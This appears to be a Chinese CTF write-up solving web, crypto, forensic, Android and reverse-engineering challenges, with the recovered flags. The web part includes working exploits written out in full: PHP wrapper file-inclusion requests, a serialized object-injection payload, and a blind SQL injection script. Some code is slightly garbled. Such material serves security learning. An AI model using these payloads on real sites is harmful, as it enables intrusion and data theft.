Web
One Two Three
<?php
highlight_file(__FILE__);
error_reporting(0);
include("ans.php");
if(isset($_GET["one"]) && isset($_GET["two"]) && isset($_POST["three"]))
{
$one = $_GET["one"];
$two = $_GET["two"];
$three = $_POST["three"];
if(!empty($one) && !empty($two) && !empty($three))
{
if(file_get_contents($two) === "g00dJ0b" and file_get_contents($three) === "onTh1s")
{
var_dump($one);
include($one);
}
}
else
die("Insufficient Parameters");
}
代码审计,用data伪协议给two和three复制,利用filter伪协议给one赋值,base64作为处理器读出来
POST /?one=php://filter/convert.base64-encode/resource=ans.php&two=data://text/plain,g00dJ0b HTTP/1.1
Host: 119.61.19.212:55001
Content-Length: 40
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://119.61.19.212:55001
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://119.61.19.212:55001/?one=php://filter/convert.base64-encode/resource=ans.php&two=data://text/plain,g00dJ0b
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=9853dac726c9531aa506675ab1597122
Connection: close
three=data%3A%2F%2Ftext%2Fplain%2ConTh1s
base64解码即可
<?php
print("D0n't try t0 tr1ck me!");
// $ans = flag{8aea34fd-a111-677d-a97c-3f5e12fa16e4};
Lesen
<?php
error_reporting(0);
highlight_file(__FILE__);
$from = $_GET['from'];
$to = $_GET['to'];
if(!isset($from) or !isset($to) or stripos($from, "flag")!=FALSE)
{
$from = "behind.php";
}
include($from);// read flag.php
if(isset($to))
{
$a = unserialize($to);
$a->sayTheFlag();
}
先读behind.php
http://119.61.19.212:55003/?from=php://filter/convert.base64-encode/resource=behind.php&to=
base64解码
<?php
error_reporting(0);
class Test
{
public $notthis;
public $variable;
public function __call($t1, $t2)
{
print($this->notthis);
}
}
class NoUse
{
public $notthis;
public $class;
public function __toString()
{
return file_get_contents($this->notthis);
}
}
?>
构造一下,先调call再调tostring,链子比较简单就不赘述了
<?php
class Test
{
public $notthis;
public $variable;
public function __construct(){
$this->notthis = new NoUse();
}
}
class NoUse
{
public $notthis;
public $class;
public function __construct(){
$this->notthis = "flag.php";
}
}
echo urlencode(serialize(new Test()));
?>
O%3A4%3A%22Test%22%3A2%3A%7Bs%3A7%3A%22notthis%22%3BO%3A5%3A%22NoUse%22%3A2%3A%7Bs%3A7%3A%22notthis%22%3Bs%3A8%3A%22flag.php%22%3Bs%3A5%3A%22class%22%3BN%3B%7Ds%3A8%3A%22variable%22%3BN%3B%7D
给to传参即可:
GET /?to=O%3A4%3A%22Test%22%3A2%3A%7Bs%3A7%3A%22notthis%22%3BO%3A5%3A%22NoUse%22%3A2%3A%7Bs%3A7%3A%22notthis%22%3Bs%3A8%3A%22flag.php%22%3Bs%3A5%3A%22class%22%3BN%3B%7Ds%3A8%3A%22variable%22%3BN%3B%7D HTTP/1.1
Host: 119.61.19.212:55003
Accept: text/plain, */*; q=0.01
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://119.61.19.212:55003/?to=O%3A4%3A%22Test%22%3A2%3A%7Bs%3A7%3A%22notthis%22%3BO%3A5%3A%22NoUse%22%3A2%3A%7Bs%3A7%3A%22notthis%22%3Bs%3A8%3A%22flag.php%22%3Bs%3A5%3A%22class%22%3BN%3B%7Ds%3A8%3A%22variable%22%3BN%3B%7D
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=9853dac726c9531aa506675ab1597122
Connection: close
<?php
die("The flag is: flag{Just_K1dd1ng_Wlth_th1s_F4ke_fl4G}")
// The real flag is: flag{9cfb19ea-b219-bfed-09bc-8e1c43fb16f3}
?>
ScoreQuery
前面爆数据库、数据表、字段的没存,原理还是简单的,布尔盲注
import requests
import string
flagstr = "1234567890qwertyuiopasdfghjklzxcvbnm}{-"
flag = ''
url = "http://119.61.19.217:55012/"
for i in range(1,45):
for c in flagstr:
tmp = url + "?id=0'/**/or/**/substr((select/**/F1ag/**/from/**/TheFl4g),{},1)='{}'%23".format(i,c)
res = requests.get(tmp)
if len(res.text) == 2263:
flag += c
print(flag)
break
Crypto
CrackCi4er
n1 = 11176298870415783282835275600061588657241463221871815491519552463408222565848079182034726185553217300689834006691472991129441397322597826835250447941841691221722446721416543093739804095340289908080867514473017079450311811803390124042848711639790285918640813661662931152276554784900720865966499111108283873361431767904939435365613871971085278398890357112336497323679975134482016115656435362909033743450396163540000606741105863043851991894541522258647025814542415404601472738921699995816713634130792482175987161484763035331960944948454215703767860312632963837039408460375085094414827681771078520774697140944693853984807
e1 = 65537
c1 = 2049142135212658273552941633440876974261753950640752177129652784905850352983432165679473874335026848351759145400964320244625330038089105524551008485108728021427824946995632603255126856753379578506783543964229942691440283255564049755866340136558644811545593331062075012791047810799296947253097390153311675026488654024461487543916802274460814350607787642849014894123082002047937769332643099034647856519147303533346991657725362212257992947710783698461322996483407717614984051267795550326657436918537790720050369514765616726515746420611017668922783549766178919288340405167353735762652502730158055821103551775066192064940
n2 = 14628452939723832473083511588210968910703852366589447308951932044211910559763838916687688620001947054794920424786224454850360778661660629608440528771433740169617993746720487612895876527947146072847716801945896849734515808742075452921890154367709390274374214553338701757577794537605478287979768372097249554390580052172699840182271033424438872211305351156295892595685726305130041874916916020353812984449226411372273954813167019471238042495646276279660976339456926385932462006559332070335515545249174455248514776056358317967032302203257464029754343434591788379595459973195410239904214340484044230212500028487107907195511
e2 = 257
c2 = 11943205429311148875261223425325670018169389197701624890446423663741223099186719632396529960156133015204496469625640992919935968122637192599196371711838810220085238215262686806595336187870118202291530645896788972981251362909696182206907049609819898202930423639770839482639933302200456662731930250303528462910052641021629680394116429930827997772982263970377753077015400323639702289539464290789532346689721249411805236223494026306249551854876805588677162485280664852101462907768951836328019109252702022466487857197139878204830652768250506210934257536926923356529983555063859891380882309438020999240607414375022018574614
模不互素
当存在两个公钥的 N 不互素时,我们显然可以直接对这两个数求最大公因数,然后直接获得 p,q,进而获得相应的私钥。
exp:
import gmpy2
import binascii
n1 = 11176298870415783282835275600061588657241463221871815491519552463408222565848079182034726185553217300689834006691472991129441397322597826835250447941841691221722446721416543093739804095340289908080867514473017079450311811803390124042848711639790285918640813661662931152276554784900720865966499111108283873361431767904939435365613871971085278398890357112336497323679975134482016115656435362909033743450396163540000606741105863043851991894541522258647025814542415404601472738921699995816713634130792482175987161484763035331960944948454215703767860312632963837039408460375085094414827681771078520774697140944693853984807
e1 = 65537
c1 = 2049142135212658273552941633440876974261753950640752177129652784905850352983432165679473874335026848351759145400964320244625330038089105524551008485108728021427824946995632603255126856753379578506783543964229942691440283255564049755866340136558644811545593331062075012791047810799296947253097390153311675026488654024461487543916802274460814350607787642849014894123082002047937769332643099034647856519147303533346991657725362212257992947710783698461322996483407717614984051267795550326657436918537790720050369514765616726515746420611017668922783549766178919288340405167353735762652502730158055821103551775066192064940
n2 = 14628452939723832473083511588210968910703852366589447308951932044211910559763838916687688620001947054794920424786224454850360778661660629608440528771433740169617993746720487612895876527947146072847716801945896849734515808742075452921890154367709390274374214553338701757577794537605478287979768372097249554390580052172699840182271033424438872211305351156295892595685726305130041874916916020353812984449226411372273954813167019471238042495646276279660976339456926385932462006559332070335515545249174455248514776056358317967032302203257464029754343434591788379595459973195410239904214340484044230212500028487107907195511
e2 = 257
c2 = 11943205429311148875261223425325670018169389197701624890446423663741223099186719632396529960156133015204496469625640992919935968122637192599196371711838810220085238215262686806595336187870118202291530645896788972981251362909696182206907049609819898202930423639770839482639933302200456662731930250303528462910052641021629680394116429930827997772982263970377753077015400323639702289539464290789532346689721249411805236223494026306249551854876805588677162485280664852101462907768951836328019109252702022466487857197139878204830652768250506210934257536926923356529983555063859891380882309438020999240607414375022018574614
p = gmpy2.gcd(n1,n2)
q1 = n1 // p
phi = (p-1)*(q1-1)
d = gmpy2.invert(e1,phi)
m = gmpy2.powmod(c1,d,n1)
q2 = n2 // p
phi = (p-1)*(q2-1)
d2 = gmpy2.invert(e2,phi)
m2 = gmpy2.powmod(c2,d2,n2)
print(binascii.unhexlify(hex(m)[2:]))
print(binascii.unhexlify(hex(m2)[2:]))
#flag{0df31ff-b12f-097a-b7ab-fe1a4bfb12e5}
Cr4ck2
flag = "*************"
p = *************
q = *************
assert(bin(q)-2) == 1024
assert(bin(p)-2) == 1024
n = p*q
phi = (p-1)*(q-1)
e1 = **
e2 = **
c1 = pow(flag, e1, n)
c2 = pow(flag, e2, n)
print(n)
print(e1)
print(e2)
print(c1)
print(c2)
公模攻击exp:
import gmpy2
from Crypto.Util.number import long_to_bytes
n = 14571489544273684681632745165173941757355029852967262639728000988042839386897493030097099884895386115482493694058873038502860513888769546717076461092157274631880422404640774568976816310850151976919429837061384758878560393916832880369835035094654445542998583110983141044252629041042005200028747437532412882541760701913277010315019696176276304794162940731256361777150089869864848752521412637555443729084762017260965056626550279092491606837302796652497491465469860146607791410672793656097187677222298486237121302232907875363012059539134811841994652897489100941594071086553725267695160318463265760189436211892048571831049
e1 = 18181
e2 = 19937
message1 = 14086932244393217502907224674408736488830849146214227184918262698062675736724337554446711585503734671616977407523947180439538475650652413419679106435434870038055027980301567294772290568083578726775663339768961737480740922223388718943787094330870471886171540256870630059797491648906275021947443613254535459415614412289718705188895798826235866579862681303315446414825328707142227744471707921742768342732559562524019443552187374960675403256064296192626351031408014769594350992074453942709110651276633951009115468620886310509692671361261934324842739148921650085982490562922669906835464674323688759465709626540284576889210
message2 = 9788755099571270122752620318833990768386552453915390611782202313009843880011885989102462216813557305415919308702993594866012255516635580308442538867800280824955615413443022611149710694144180395588528536827198061901961298781041399064307258829088210698947995786806886824892341393690873854230422832064661235313593912677068722144241580197984421905987499008664508485233509643273752098892825326153287135195132848517181638343515469682704077797334084053581822968060796475866168907228760199308163970477417979781603099935953389513751241815586854968725454388470460653618696872424888914546835979441528674579794525553550639554293
# s & t
gcd, s, t = gmpy2.gcdext(e1, e2)
if s < 0:
s = -s
message1 = gmpy2.invert(message1, n)
if t < 0:
t = -t
message2 = gmpy2.invert(message2, n)
plain = gmpy2.powmod(message1, s, n) * gmpy2.powmod(message2, t, n) % n
print(plain)
print(long_to_bytes(plain))
#flag{afe12ec-c1be-421f-c0fa-ea2f6ceb10a0}
n_n
ucnd fclsmn.rmjy.irdapc jdsncm zpmscjdp, almph_mn_yniz
ucnd hpfcpm jdsncm uyvz
jdsncm zdsl2
s = zpmscjdp(1024)
x = zpmscjdp(1024)
i = s * x
p = 0g130u7u3
k = zdsl2.jiwpcm(p, (s-1)*(x-1))
jiws_x = zdsl2.jiwpcm(s, x)
jiwx_s = zdsl2.jiwpcm(x, s)
d = almph_mn_yniz(uyvz)
f = zdsl2.snbdnk(d, p, i)
scjim(p)
scjim(k)
scjim(jiws_x)
scjim(jiwx_s)
scjim(f)
'''
19986419
3246030980112569716252525489178402976566547966168594693884910274513154299462041341004375201921016318938426026345098668299377474330375073434720935772407207944175167323817898036516011079576927822972280584550642421759163857196487310343842151887753901290056007928776238985151298531470667875043069631236869106891057021962478109360022955201129953336276429238305672598460147562806963064866859947227329083491706302615233310732434276569920504055705370558759864687603230396302816302264528911561986103345422868194300484993924394687653074699941027740263298870609889050004072341364150017277319759241334188164360195703910784166355
23389236347134283235213306702183810016424721867486963556461081084876520502820941836694411695676757754191365637169094291954507615676165999068189562213594619012687252636744435260033076208286475321060918985189871377901228212667433573382718485160649112811594950994116619369682212010587535385364596418447338709974
102920556609507191536438498232122774923059359709189772008951429751731499708926283579532737890030392620334257693429608011647339365489651578950937878926965514185822024062626226427621775843089345409431424163821245825850075741313035783453477904427927137045546100973267423868918950101645341426259141920145517101346
1553892238198363827492950017785469649883078335860404183601470514633985702148771439291915519584864956768837128975747502834867950051639396112333353729920983641277214334076161962538797900388907160490701194265684200572530520821773449401826082542234651817152190240489004982304794568360099499384170323027423530546020874791949260720440971235829841009999271630682762487975448340845503303511707467319967171026472363519627299488034799105120005884793797012235913877429590605758066993126024240880065915024533204819606519268788794771634158963247834960191894770256479582799808670787421459015846778168822826961225790849202125973374
'''
词频修复
from crypto.util.number import getprime, bytes_to_long
import gmpy2
p = getprime(1024)
q = getprime(1024)
n = p * q
e = 19986419
d = 3246030980112569716252525489178402976566547966168594693884910274513154299462041341004375201921016318938426026345098668299377474330375073434720935772407207944175167323817898036516011079576927822972280584550642421759163857196487310343842151887753901290056007928776238985151298531470667875043069631236869106891057021962478109360022955201129953336276429238305672598460147562806963064866859947227329083491706302615233310732434276569920504055705370558759864687603230396302816302264528911561986103345422868194300484993924394687653074699941027740263298870609889050004072341364150017277319759241334188164360195703910784166355
invp_q = 23389236347134283235213306702183810016424721867486963556461081084876520502820941836694411695676757754191365637169094291954507615676165999068189562213594619012687252636744435260033076208286475321060918985189871377901228212667433573382718485160649112811594950994116619369682212010587535385364596418447338709974
invk_p = 102920556609507191536438498232122774923059359709189772008951429751731499708926283579532737890030392620334257693429608011647339365489651578950937878926965514185822024062626226427621775843089345409431424163821245825850075741313035783453477904427927137045546100973267423868918950101645341426259141920145517101346
c = 1553892238198363827492950017785469649883078335860404183601470514633985702148771439291915519584864956768837128975747502834867950051639396112333353729920983641277214334076161962538797900388907160490701194265684200572530520821773449401826082542234651817152190240489004982304794568360099499384170323027423530546020874791949260720440971235829841009999271630682762487975448340845503303511707467319967171026472363519627299488034799105120005884793797012235913877429590605758066993126024240880065915024533204819606519268788794771634158963247834960191894770256479582799808670787421459015846778168822826961225790849202125973374
invp_k = gmpy2.invert(p, q)
invk_p = gmpy2.invert(q, p)
d = gmpy2.invert(e, (p - 1) * (q - 1))
c = gmpy2.podmow(m, e, n)
print(e)
print(d)
print(invp_q)
print(invk_p)
print(c)
e = 19986419
d = 3246030980112569716252525489178402976566547966168594693884910274513154299462041341004375201921016318938426026345098668299377474330375073434720935772407207944175167323817898036516011079576927822972280584550642421759163857196487310343842151887753901290056007928776238985151298531470667875043069631236869106891057021962478109360022955201129953336276429238305672598460147562806963064866859947227329083491706302615233310732434276569920504055705370558759864687603230396302816302264528911561986103345422868194300484993924394687653074699941027740263298870609889050004072341364150017277319759241334188164360195703910784166355
invp_q = 23389236347134283235213306702183810016424721867486963556461081084876520502820941836694411695676757754191365637169094291954507615676165999068189562213594619012687252636744435260033076208286475321060918985189871377901228212667433573382718485160649112811594950994116619369682212010587535385364596418447338709974
invk_p = 102920556609507191536438498232122774923059359709189772008951429751731499708926283579532737890030392620334257693429608011647339365489651578950937878926965514185822024062626226427621775843089345409431424163821245825850075741313035783453477904427927137045546100973267423868918950101645341426259141920145517101346
c = 1553892238198363827492950017785469649883078335860404183601470514633985702148771439291915519584864956768837128975747502834867950051639396112333353729920983641277214334076161962538797900388907160490701194265684200572530520821773449401826082542234651817152190240489004982304794568360099499384170323027423530546020874791949260720440971235829841009999271630682762487975448340845503303511707467319967171026472363519627299488034799105120005884793797012235913877429590605758066993126024240880065915024533204819606519268788794771634158963247834960191894770256479582799808670787421459015846778168822826961225790849202125973374
Rabin加密exp:
from Crypto.Util.number import long_to_bytes
import gmpy2
e = 19986419
d = 3246030980112569716252525489178402976566547966168594693884910274513154299462041341004375201921016318938426026345098668299377474330375073434720935772407207944175167323817898036516011079576927822972280584550642421759163857196487310343842151887753901290056007928776238985151298531470667875043069631236869106891057021962478109360022955201129953336276429238305672598460147562806963064866859947227329083491706302615233310732434276569920504055705370558759864687603230396302816302264528911561986103345422868194300484993924394687653074699941027740263298870609889050004072341364150017277319759241334188164360195703910784166355
invp_q = 23389236347134283235213306702183810016424721867486963556461081084876520502820941836694411695676757754191365637169094291954507615676165999068189562213594619012687252636744435260033076208286475321060918985189871377901228212667433573382718485160649112811594950994116619369682212010587535385364596418447338709974
invk_p = 102920556609507191536438498232122774923059359709189772008951429751731499708926283579532737890030392620334257693429608011647339365489651578950937878926965514185822024062626226427621775843089345409431424163821245825850075741313035783453477904427927137045546100973267423868918950101645341426259141920145517101346
c = 1553892238198363827492950017785469649883078335860404183601470514633985702148771439291915519584864956768837128975747502834867950051639396112333353729920983641277214334076161962538797900388907160490701194265684200572530520821773449401826082542234651817152190240489004982304794568360099499384170323027423530546020874791949260720440971235829841009999271630682762487975448340845503303511707467319967171026472363519627299488034799105120005884793797012235913877429590605758066993126024240880065915024533204819606519268788794771634158963247834960191894770256479582799808670787421459015846778168822826961225790849202125973374
key = e * d - 1
cnt = 0
def solve(x, y, z):
decode = y ** 2 - 4 * x * z
assert gmpy2.is_square(decode)
x1 = (-y + gmpy2.isqrt(decode)) // (2 * x)
x2 = (-y - gmpy2.isqrt(decode)) // (2 * x)
return x1, x2
for k in range(3, e):
if key % k == 0:
cnt += 1
phi_n = key // k
ll = invp_q - 1
m = invp_q * invk_p - 1 + (invp_q - 1) * (invk_p - 1) - phi_n
n = (invk_p - 1) * (invp_q * invk_p - 1)
try:
k1, k2 = solve(ll, m, n)
if (invp_q * invk_p - 1) % k1 == 0:
k2 = (invp_q * invk_p - 1) // k1
elif (invp_q * invk_p - 1) % k2 == 0:
k1, k2 = k2, (invp_q * invk_p - 1) // k2
else:
assert False
p, q = invp_q + k2, invk_p + k1
N = p * q
flag = long_to_bytes(pow(c, d, N)).strip()
print(flag)
break
except:
pass
#flag{e171892fdcccfc5b0c390806b975a72c}
Misc
BlackAndWhite
打开附件,发现是黑色和白色照片,猜测代表2进制,一共336张
脚本如下
white = open('D:/Users/huawei/Desktop/target/0.png', 'rb').read()
black = open('D:/Users/huawei/Desktop/target/1.png', 'rb').read()
flag = ''
for i in range(336):
color = open('D:/Users/xxxx/Desktop/target/%d.png'%i, 'rb').read()
if(color == white):
flag += '0'
else:
flag += '1'
ans = ''
length = len(flag)//8
for i in range(length):
ans += chr(int(flag[i*8: (i+1)*8], 2))
print(ans)
flag{baaf013d-f3fa-bcbe-00fb-1e1a34bb2af1}
Analyze
PDF文件
base64编码过
VGhlIHBhc3N3b3JkIGlzIG5vdCBqdXN0IGFib3V0IGRlY29kaW5nLCBidXQgYWxzbyBoYWNraW5nIHRoZSBaSVAh
解码之后
The password is not just about decoding, but also hacking the ZIP!
提示爆破,爆破出密码为cr4ck!*
成功解压
使用stegsolve打开图片
拿到flag
flag{abae93fb-c31f-aeaf-91fc-0f1d42ba26e4}
DocDocDoc
打开附件
D:UsersxxxxDesktopHello Flagwordmedia
这个路径下有两张图片
第二张图片,使用tweakpng修改高度为960
打开图片
pvkq{olp281m-m2pk-kmlo-81pl-2o2m08m0pmk1}
位移密码,key=10
flag{ebf281c-c2fa-acbe-81fb-2e2c08c0fca1}
Digtal_plate
流量包报错
提取usbdata脚本
#!/usr/bin/env python
# coding:utf-8
import sys
import os
import numpy as np
import matplotlib.pyplot as plt
mousePositionX = 0
mousePositionY = 0
X = []
Y = []
DataFileName = "usb.dat"
data = []
def main():
global mousePositionX
global mousePositionY
# check argv
if len(sys.argv) != 3:
print ("Usage : ")
print (" python UsbMiceHacker.py data.pcap [LEFT|RIGHT|MOVE|ALL]")
print ("Tips : ")
print (" To use this python script , you must install the numpy,matplotlib first.")
print (" You can use `sudo pip install matplotlib numpy` to install it")
print ("Author : ")
print (" WangYihang <[email protected]>")
print (" If you have any questions , please contact me by email.")
print (" Thank you for using.")
exit(1)
# get argv
pcapFilePath = sys.argv[1]
action = sys.argv[2]
if action != "LEFT" and action != "ALL" and action != "RIGHT" and action != "MOVE":
action = "LEFT"
# get data of pcap
command = "tshark -r '%s' -T fields -e usbhid.data > %s" % (
pcapFilePath, DataFileName)
print (command)
os.system(command)
# read data
with open(DataFileName, "r") as f:
for line in f:
data.append(line[0:-1])
# handle move
for i in data:
Bytes = i.split(":")
if len(Bytes) == 8:
horizontal = 2 # -
vertical = 4 # |
elif len(Bytes) == 4:
horizontal = 1 # -
vertical = 2 # |
else:
continue
offsetX = int(Bytes[horizontal], 16)
offsetY = int(Bytes[vertical], 16)
if offsetX > 127:
offsetX -= 256
if offsetY > 127:
offsetY -= 256
mousePositionX += offsetX
mousePositionY += offsetY
if Bytes[0] == "01":
# print "[+] Left butten."
if action == "LEFT":
# draw point to the image panel
X.append(mousePositionX)
Y.append(-mousePositionY)
elif Bytes[0] == "02":
# print "[+] Right Butten."
if action == "RIGHT":
# draw point to the image panel
X.append(mousePositionX)
Y.append(-mousePositionY)
elif Bytes[0] == "00":
# print "[+] Move."
if action == "MOVE":
# draw point to the image panel
X.append(mousePositionX)
Y.append(-mousePositionY)
else:
# print "[-] Known operate."
pass
if action == "ALL":
# draw point to the image panel
X.append(mousePositionX)
Y.append(-mousePositionY)
fig = plt.figure()
ax1 = fig.add_subplot(111)
ax1.set_title('[%s]-[%s] Author : WangYihang' % (pcapFilePath, action))
ax1.scatter(X, Y, c='r', marker='o')
plt.show()
# clean temp data
os.system("rm ./%s" % (DataFileName))
if __name__ == "__main__":
main()
发现是 数位板流量(前三位是088,后8位是八个0)
判断是数位板上画图
画图脚本
import sys
import os
import numpy as np
import matplotlib.pyplot as plt
data=[]
with open("usbdata.txt","r") as f:
for line in f.readlines():
data.append(line)
X = []
Y = []
for line in data:
x0=int(line[4:6],16)
x1=int(line[6:8],16)
x=x0+x1*256
y0=int(line[8:10],16)
y1=int(line[10:12],16)
y=y0+y1*256
X.append(x)
Y.append(-y)
fig = plt.figure()
ax1 = fig.add_subplot(111)
ax1.set_title("key")
ax1.scatter(X, Y, c='r', marker='o')
plt.show()
画图结果如下
拿到一个key
kaseyd4wi2v3sc518dc84bsa4a96
binwalk -e 出来一个zip文件
解压密码就是上面那个
解压出一个图片
猜测是silenteye解密,解密失败
备注发现异常
写的太轻,提示到数位板画画的时候,会有压力感觉
看一下前面都有
0880应该是标识所以画点的数据应该在后面
有数值的是八位
所以x四位y四位
然后发现后面有0880,0881
两个都导出一下,0880是没按压,0881是按压,把0881为前缀的数据提取出来然后描点就行了
import matplotlib.pyplot as plt
import sys
import numpy as np
import os
data=[]
with open("usbhiddata.txt","r") as f:
for line in f.readlines():
data.append(line)
X = []
Y = []
for line in data:
x0=int(line[4:6],16)
x1=int(line[6:8],16)
x=x0+x1*256
y0=int(line[8:10],16)
y1=int(line[10:12],16)
y=y0+y1*256
X.append(x)
Y.append(-y)
fig = plt.figure()
ax1 = fig.add_subplot(111)
ax1.set_title("key")
ax1.scatter(X, Y, c='r', marker='o')
plt.show()
提取带有压感的流量数据,画图得到
18cba496
作为key,使用slienceeye解密
flag{42a12187c01a4a4f2b3f5ccd0a019656}
Mobile
andlua
apk反编译,找到res/raw路径下的lua 脚本
function doEncrypt(tv,input)
local input_byte = {}
local input_len = string.len(input)
for i = 1, input_len do
input_byte[i-1] = string.byte(input, i, i)
end
local a = "vm_start"
input_byte[0] = 23
input_byte[0] = 5
input_byte[0] = 33
input_byte[0] = 11
input_byte[0] = 14
input_byte[1] = 10
input_byte[1] = 21
input_byte[1] = 7
input_byte[1] = 40
input_byte[1] = 12
input_byte[2] = 32
input_byte[2] = 32
input_byte[2] = 35
input_byte[2] = 13
input_byte[2] = 14
input_byte[3] = 26
input_byte[3] = 7
input_byte[3] = 25
input_byte[3] = 25
input_byte[3] = 1
input_byte[4] = 3
input_byte[4] = 4
input_byte[4] = 13
input_byte[4] = 27
input_byte[4] = 5
input_byte[5] = 25
input_byte[5] = 13
input_byte[5] = 1
input_byte[5] = 33
input_byte[5] = 38
input_byte[6] = 33
input_byte[6] = 24
input_byte[6] = 31
input_byte[6] = 17
input_byte[6] = 24
input_byte[7] = 20
input_byte[7] = 26
input_byte[7] = 8
input_byte[7] = 20
input_byte[7] = 40
input_byte[8] = 25
input_byte[8] = 18
input_byte[8] = 3
input_byte[8] = 7
input_byte[8] = 34
input_byte[9] = 26
input_byte[9] = 37
input_byte[9] = 8
input_byte[9] = 15
input_byte[9] = 28
input_byte[10] = 31
input_byte[10] = 21
input_byte[10] = 31
input_byte[10] = 19
input_byte[10] = 21
input_byte[11] = 19
input_byte[11] = 3
input_byte[11] = 37
input_byte[11] = 13
input_byte[11] = 20
input_byte[12] = 18
input_byte[12] = 12
input_byte[12] = 15
input_byte[12] = 3
input_byte[12] = 4
input_byte[13] = 33
input_byte[13] = 21
input_byte[13] = 33
input_byte[13] = 7
input_byte[13] = 18
input_byte[14] = 15
input_byte[14] = 23
input_byte[14] = 3
input_byte[14] = 12
input_byte[14] = 40
input_byte[15] = 11
input_byte[15] = 32
input_byte[15] = 25
input_byte[15] = 34
input_byte[15] = 36
input_byte[16] = 9
input_byte[16] = 9
input_byte[16] = 37
input_byte[16] = 19
input_byte[16] = 27
input_byte[17] = 36
input_byte[17] = 10
input_byte[17] = 30
input_byte[17] = 14
input_byte[17] = 14
input_byte[18] = 10
input_byte[18] = 34
input_byte[18] = 6
input_byte[18] = 31
input_byte[18] = 27
input_byte[19] = 11
input_byte[19] = 9
input_byte[19] = 29
input_byte[19] = 40
input_byte[19] = 5
input_byte[20] = 20
input_byte[20] = 35
input_byte[20] = 26
input_byte[20] = 29
input_byte[20] = 21
input_byte[21] = 31
input_byte[21] = 19
input_byte[21] = 8
input_byte[21] = 1
input_byte[21] = 4
input_byte[22] = 37
input_byte[22] = 39
input_byte[22] = 25
input_byte[22] = 12
input_byte[22] = 20
input_byte[23] = 17
input_byte[23] = 24
input_byte[23] = 19
input_byte[23] = 1
input_byte[23] = 9
input_byte[24] = 19
input_byte[24] = 18
input_byte[24] = 11
input_byte[24] = 28
input_byte[24] = 21
input_byte[25] = 7
input_byte[25] = 6
input_byte[25] = 6
input_byte[25] = 31
input_byte[25] = 8
input_byte[26] = 9
input_byte[26] = 22
input_byte[26] = 13
input_byte[26] = 14
input_byte[26] = 30
input_byte[27] = 7
input_byte[27] = 19
input_byte[27] = 34
input_byte[27] = 3
input_byte[27] = 9
input_byte[28] = 39
input_byte[28] = 16
input_byte[28] = 28
input_byte[28] = 15
input_byte[28] = 15
input_byte[29] = 26
input_byte[29] = 19
input_byte[29] = 11
input_byte[29] = 15
input_byte[29] = 27
input_byte[30] = 29
input_byte[30] = 32
input_byte[30] = 11
input_byte[30] = 26
input_byte[30] = 33
input_byte[31] = 13
input_byte[31] = 10
input_byte[31] = 11
input_byte[31] = 8
input_byte[31] = 12
input_byte[32] = 14
input_byte[32] = 21
input_byte[32] = 13
input_byte[32] = 9
input_byte[32] = 13
input_byte[33] = 21
input_byte[33] = 9
input_byte[33] = 24
input_byte[33] = 27
input_byte[33] = 23
input_byte[34] = 10
input_byte[34] = 7
input_byte[34] = 24
input_byte[34] = 8
input_byte[34] = 39
input_byte[35] = 8
input_byte[35] = 30
input_byte[35] = 21
input_byte[35] = 37
input_byte[35] = 20
input_byte[36] = 30
input_byte[36] = 26
input_byte[36] = 2
input_byte[36] = 17
input_byte[36] = 29
input_byte[37] = 22
input_byte[37] = 8
input_byte[37] = 31
input_byte[37] = 16
input_byte[37] = 8
local b = "vm_end"
local c = "vm_check"
tv:setText(c)
end
op_num = [23, 5, 33, 11, 14, 10, 21, 7, 40, 12, 32, 32, 35, 13, 14, 26, 7, 25, 25, 1, 3, 4, 13, 27, 5, 25, 13, 1, 33,
38, 33, 24, 31, 17, 24, 20, 26, 8, 20, 40, 25, 18, 3, 7, 34, 26, 37, 8, 15, 28, 31, 21, 31, 19, 21, 19, 3, 37,
13, 20, 18, 12, 15, 3, 4, 33, 21, 33, 7, 18, 15, 23, 3, 12, 40, 11, 32, 25, 34, 36, 9, 9, 37, 19, 27, 36, 10,
30, 14, 14, 10, 34, 6, 31, 27, 11, 9, 29, 40, 5, 20, 35, 26, 29, 21, 31, 19, 8, 1, 4, 37, 39, 25, 12, 20, 17,
24, 19, 1, 9, 19, 18, 11, 28, 21, 7, 6, 6, 31, 8, 9, 22, 13, 14, 30, 7, 19, 34, 3, 9, 39, 16, 28, 15, 15, 26,
19, 11, 15, 27, 29, 32, 11, 26, 33, 13, 10, 11, 8, 12, 14, 21, 13, 9, 13, 21, 9, 24, 27, 23, 10, 7, 24, 8, 39,
8, 30, 21, 37, 20, 30, 26, 2, 17, 29, 22, 8, 31, 16, 8]
cipher = [0x66, 0x00000080, 0x0000005D, 0x00000075, 0x00000095, 0x0000003D, 0x0000004B, 0x0000005B, 0x000000A0,
0x0000000C, 0x0000002F, 0x0000006E, 0x0000005A, 0x00000081, 0x00000044, 0x00000053, 0x0000000E, 0x00000070,
0x0000005E, 0x00000008, 0x00000014, 0x00000035, 0x00000020, 0x00000066, 0x0000009F, 0x00000033, 0x00000049,
0x00000046, 0x0000006B, 0x0000004D, 0x0000002F, 0x0000005E, 0x00000062, 0x0000000F, 0x00000053, 0x00000067,
0x0000005D, 0x00000084]
k = 0
for i in range(0, len(op_num), 5):
for j in range(4, -1, -1):
if op_num[i + j] > 9:
if op_num[i + j] > 19:
cipher[k] ^= op_num[i + j]
else:
cipher[k] -= op_num[i + j]
else:
cipher[k] += op_num[i + j]
k += 1
for i in cipher:
print(chr(i), end='')
#flag{7dac6284cea9d861034f73df34861ae5}
Reverse
go2cry
8位一组加密,共计4组
part 1
简单单字节操作
循环结构如下
for i in range(0, 4, 3)
而后调用math_big___ptr_Int__SetInt64 转为int64
math_big_nat_setBytes转为big-endian
part 2
而后进入异或循环,v14有符号,通过判断符号正负确定是否异或
part 3
最后进入位操作,看起来很复杂,实际上只是将每个字节按照位序拼接
化简运算之后
revs = [0x4C, 0xB2, 0x06, 0xFE, 0x4C, 0xA8, 0xDE, 0x60]
